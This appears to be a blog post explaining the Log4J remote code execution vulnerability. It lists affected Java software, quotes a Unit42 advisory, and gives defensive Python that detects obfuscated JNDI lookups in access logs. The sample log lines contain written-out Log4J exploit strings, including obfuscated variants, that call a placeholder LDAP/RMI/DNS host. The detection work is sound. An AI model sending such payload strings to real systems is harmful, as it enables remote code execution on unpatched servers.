Real Story of Log4J

Affected Software

A significant number of Java-based applications are using log4j as their logging utility and are vulnerable to this CVE. To the best of our knowledge, at least the following software may be impacted:

  • Apache Struts
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • ElasticSearch
  • Flume
  • Apache Dubbo
  • Logstash
  • Kafka
  • Spring-Boot-starter-log4j2

So you can see that Apache projects and many other software packages inherit this vulnerability from the Java-based Log4J library:

“By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload. Due to the discovery of this exploit being so recent, there are still many servers, both on-premises and within cloud environments, that have yet to be patched.”

Log4J is used as a logging tool within Java programs that are embedded in other software (such as Apache products); for example, here is Apache's logging documentation:

It is worth noting this before one can truly understand how deeply Log4J is intertwined with many pieces of software.

Palo Alto Unit42 also published a good write-up of the cybersecurity issues, and its executive summary is worth reviewing:

On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache log4j 2 was identified being exploited in the wild. Public proof of concept (PoC) code was released and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload. Due to the discovery of this exploit being so recent, there are still many servers, both on-premises and within cloud environments, that have yet to be patched. Like many high severity RCE exploits, thus far, massive scanning activity for CVE-2021-44228 has begun on the internet with the intent of seeking out and exploiting unpatched systems. We highly recommend that organizations upgrade to the latest version (2.17.0) of Apache log4j 2 for all systems. This version also patches the additional vulnerabilities CVE-2021-45046, found on Dec. 14, and CVE-2021-45105, found on Dec. 17.

One immediately notices that there are now three CVEs for similar Log4J attacks; the extra scrutiny has surfaced additional exploitable vulnerabilities.

Another point is that almost immediately after the vulnerability was disclosed there was “massive” activity on the Internet looking for systems to compromise.
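The scanning described above shows up in web server access logs as requests carrying a Log4J lookup string. As an added example (not code from the original post or from Unit42), the Python below normalizes the nested-lookup tricks used to hide the `jndi:` keyword and flags the log lines that contain one; the access-log lines and the `example.invalid` callback host are constructed for the demonstration and are not real indicators.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not taken from the original post or any
# real incident); example.invalid is a placeholder callback host, not an IoC.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Dec/2021:03:15:22 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"
10.0.0.7 - - [10/Dec/2021:03:16:01 +0000] "GET /?x=${${lower:j}ndi:${lower:rmi}://example.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.8 - - [10/Dec/2021:03:17:45 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://example.invalid/c}"
10.0.0.9 - - [10/Dec/2021:03:18:10 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

INNER = re.compile(r"\$\{([^${}]*)\}")          # innermost ${...} with no nesting
JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)
FROZEN = "\x00{"                                 # marks a lookup we leave unresolved

def resolve(body: str) -> Optional[str]:
    """Evaluate the Log4j lookup forms commonly used to disguise 'jndi'.
    Returns None for lookups that need runtime state (jndi, env, sys, date)."""
    if ":-" in body:                             # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep and name.lower() == "lower":
        return arg.lower()
    if sep and name.lower() == "upper":
        return arg.upper()
    return None

def normalize(text: str) -> str:
    """Collapse nested lookups inside-out until only unresolvable ones remain."""
    while (m := INNER.search(text)):
        value = resolve(m.group(1))
        if value is None:
            value = FROZEN + m.group(1) + "}"    # freeze so the loop terminates
        text = text[:m.start()] + value + text[m.end():]
    return text.replace(FROZEN, "${")

def scan_log(log: str) -> List[Dict[str, object]]:
    """Return one record per log line that carries a jndi: lookup after normalization."""
    hits = []
    for lineno, line in enumerate(log.splitlines(), 1):
        match = JNDI.search(normalize(line))
        if match:
            hits.append({"line": lineno, "client": line.split(" ", 1)[0],
                         "lookup": match.group(0)})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']} from {hit['client']}: {hit['lookup']}")
```

A plain substring match on `${jndi:` misses lines 3 and 4 of the sample; normalizing first catches all three probes and leaves the harmless `${date:yyyy}` request alone.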

Patching your systems is imperative and must be a high priority for you – get my book to get started understanding this phenomenon.

I will be adding to this post as time permits and things change!!
